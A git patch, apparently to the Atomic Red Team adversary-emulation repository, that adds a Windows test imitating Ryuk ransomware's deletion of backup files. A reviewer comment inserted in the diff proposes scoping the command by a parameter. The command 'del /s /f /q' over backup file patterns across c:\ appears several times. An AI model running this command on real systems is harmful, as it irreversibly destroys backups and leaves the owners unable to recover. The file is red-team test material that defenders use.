From d6f86288182ecbb150db2c01d611b70ba146c0b0 Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Thu, 14 Nov 2019 15:06:09 -0600
Subject: [PATCH] T1485 Test to delete backup files similar to Ryuk (#659)

* T1485 Test to delete backup files similar to Ryuk
* Generate docs from job=validate_atomics_generate_docs branch=t1485-del-backups
---
 atomics/T1485/T1485.md | 18 ++++++++++++++++++
 atomics/T1485/T1485.yaml | 14 +++++++++++++-
 atomics/index.md | 1 +
 atomics/index.yaml | 14 +++++++++++++-
 atomics/windows-index.md | 1 +
 5 files changed, 46 insertions(+), 2 deletions(-)

diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index d57cabe4..ebd00c73 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -18,6 +18,8 @@ To maximize impact on the target organization in operations where network-wide a
 - [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
@@ -114,4 +116,20 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+```
+
+
+
diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml
index a0c216cc..cb61c927 100644
--- a/atomics/T1485/T1485.yaml
+++ b/atomics/T1485/T1485.yaml
@@ -87,4 +87,16 @@ atomic_tests:
 executor:
 name: bash
 command: |
- dd of=#{file_to_overwrite} if=#{overwrite_source}
\ No newline at end of file
+ dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+- name: Windows - Delete Backup Files
+ description: |
+ Deletes backup files in a manner similar to Ryuk ransomware.
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ command: |
+ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index 88270e2c..e1b2e7c2 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -474,6 +474,7 @@
 - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
 - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
 - Atomic Test #5: macOS/Linux - Overwrite file with DD [centos, linux, macos, ubuntu]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
 - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 243d8e5c..116f896d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
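Review bot: The new `Windows - Delete Backup Files` entry hard-codes `c:\` as the search root, so `del /s /f /q` walks the entire system drive and irreversibly removes any real `.bak`, `.VHD` or `Backup*` files it finds, with no `input_arguments` to scope it and no mention of that consequence in `description`; the sibling test in the same hunk parameterizes its target through `#{file_to_overwrite}`, so this one should follow the same pattern. I would add an `input_arguments` entry (`backup_root` below is a constructed name) whose default preserves the current `c:\` behaviour but lets an operator point the test at a scratch directory, reference it in the command, and extend the description to say the deletion is destructive and should run only on a disposable host. The new last line still carries `\ No newline at end of file`, which is worth fixing while the file is being touched. The `atomic_tests` sequence this entry extends begins outside the hunk.
```yaml
- name: Windows - Delete Backup Files
  description: |
    Deletes backup files in a manner similar to Ryuk ransomware.
    Destructive and irreversible: every file under backup_root matching the
    patterns below is removed. Run only on a disposable host, or override
    backup_root to point at a scratch directory.

  supported_platforms:
    - windows

  input_arguments:
    backup_root:
      description: Drive or directory (no trailing backslash) searched recursively for backup files
      type: Path
      default: "c:"

  executor:
    name: command_prompt
    command: |
      del /s /f /q #{backup_root}\*.VHD #{backup_root}\*.bac #{backup_root}\*.bak #{backup_root}\*.wbcat #{backup_root}\*.bkf #{backup_root}\Backup*.* #{backup_root}\backup*.* #{backup_root}\*.set #{backup_root}\*.win #{backup_root}\*.dsk
```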
@@ -13903,7 +13903,19 @@ impact:
 default: "/var/log/syslog"
 executor:
 name: bash
- command: dd of=#{file_to_overwrite} if=#{overwrite_source}
+ command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+'
+ - name: Windows - Delete Backup Files
+ description: 'Deletes backup files in a manner similar to Ryuk ransomware.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ command: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+ c:\backup*.* c:\*.set c:\*.win c:\*.dsk
 '':
 technique:
 x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index aef1b765..a4a50715 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -330,6 +330,7 @@
 - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
 - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
 - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
 - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)